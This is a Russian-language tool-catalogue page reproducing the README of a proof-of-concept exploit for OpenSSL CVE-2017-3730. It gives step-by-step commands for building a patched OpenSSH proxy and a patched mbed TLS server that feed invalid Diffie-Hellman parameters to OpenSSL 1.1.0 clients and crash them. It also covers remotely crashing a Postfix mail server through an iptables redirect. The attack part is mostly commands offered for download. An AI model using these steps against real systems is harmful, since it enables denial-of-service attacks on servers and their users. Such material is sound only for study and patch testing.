Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-3730 — OpenSSL CVE-2017-3730: концепт-эксплойт | Kitploit
Инструменты/GitHubGitHub/olivierh59500/cve-2017-3730
Анализ уязвимостейЭксплуатацияСетевая безопасностьКриптографияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubolivierh59500/cve-2017-3730

CVE-2017-3730

OpenSSL CVE-2017-3730: концепт-эксплойт

Репозиторий
59 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-3730

OpenSSL CVE-2017-3730 концепт-эксплойт

Использование OpenSSH в качестве прокси для изменения значений DH на лету

  • Создайте SSL-сервер, использующий набор шифров, например DHE-PSK-WITH-AES-256-GCM-SHA384. Предположим, он работает на 10.0.2.2, порт 8899
  • Скачайте openssh-7.4p1
  • Примените патч
  • Соберите его
  • Запустите его так:
root@kitploit:~
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
  • В другом терминале создайте файл ~/.tsocks.conf со следующим содержимым:
root@kitploit:~
server = 127.0.0.1
server_port = 1085
server_type = 5
local = 127.0.0.0/255.255.255.0
  • ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
  • tsocks
  • Это создаёт оболочку, в которой весь сетевой трафик проходит через наш «злой» прокси
  • openssl s_client -connect 10.0.2.2:8899 -psk AA
  • крах

Изменение mbed TLS для выдачи недопустимого параметра DH

  • Скачайте https://github.com/ARMmbed/mbedtls/archive/mbedtls-2.4.1.tar.gz
  • Примените mbedtls-2.4.1-patch.txt
  • make -j4 programs
  • Запустите сервер: programs/ssl/ssl_server2 force_ciphersuite=TLS-DHE-RSA-WITH-AES-256-GCM-SHA384
  • Подключитесь к нему с помощью клиента OpenSSL 1.1.0
  • крах

Удалённый крах postfix

  • Скомпилируйте postfix с OpenSSL 1.1.0
  • Скомпилируйте crash-postfix.c с использованием ПРОПАТЧЕННОГО mbed TLS (см. выше)
  • Я делал следующее: запускал postfix в виртуальной машине, а crash-postfix — на хосте:
  • iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination 10.0.2.2:8888
  • Запустите crash-postfix
  • Запустите postfix: posttls-finger 10.0.2.2
  • крах
Скачать инструмент